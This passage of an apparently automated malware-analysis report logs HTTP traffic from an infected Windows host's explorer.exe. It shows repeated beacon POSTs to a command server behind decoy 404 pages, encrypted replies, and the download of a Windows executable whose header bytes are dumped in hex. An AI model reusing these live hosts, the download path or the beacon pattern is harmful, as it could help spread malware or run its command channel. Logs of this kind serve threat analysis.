                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    45192.168.2.34984094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.298963070 CET11935OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://umttqygm.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.387739897 CET11937INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:39 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    46192.168.2.34984294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.484862089 CET11939OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://dujdgqdl.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 199
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.570105076 CET11940INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:39 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    47192.168.2.34984394.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.656476021 CET11942OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://acontkk.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 334
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.737250090 CET11943INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:39 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    48192.168.2.34984594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.859819889 CET11945OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://rwkvcn.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 355
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:39.964689970 CET11946INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:39 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    49192.168.2.34984694.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.050098896 CET11948OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://urrhyr.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 155
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.132122040 CET11949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:40 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    5192.168.2.349884144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    50192.168.2.34984894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.220174074 CET11950OUTGET /files/6961_1642089187_2359.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: data-host-coin-8.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:40.283812046 CET11953INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:40 GMT
                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                    Content-Length: 905216
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Last-Modified: Thu, 13 Jan 2022 15:53:07 GMT
                                                                                                                                                                                                    ETag: "dd000-5d578aeb4049d"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 01 00 32 41 00 e9 09 11 00 00 56 8b f1 c7 06 00 32 41 00 e8 fb 10 00 00 f6 44 24 08 01 74 07 56 e8 88 14 00 00 59 8b c6 5e c2 04 00 55 8b ec ff 75 14 ff 75
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gqIvhExfcRichPEL[_ 200@P|qXf(p 1@Y@0.text `.rdata"?0@$@@.data8pd@.rsrc np@@2AV2AD$tVY^Uuu


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    51192.168.2.34985594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.839482069 CET12905OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://bqqdf.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 333
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:41.921860933 CET12906INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:41 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    52192.168.2.34985794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.005439043 CET12908OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://dcbwcxee.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.089756012 CET12909INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:42 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 1fI:82OI%70


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    53192.168.2.34986194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.699807882 CET12930OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://vwrxdxe.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 345
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:42.781038046 CET12932INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:42 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 30I:82OTevg]fdP0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    54192.168.2.34986494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.086858034 CET12940OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://kijlaf.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 236
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.176691055 CET12941INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:43 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    55192.168.2.34986694.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.284842968 CET12943OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://xbgcbdcvsv.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 299
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.367590904 CET12944INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:43 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    56192.168.2.34986794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:43.584142923 CET12945OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://kvaxa.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 235
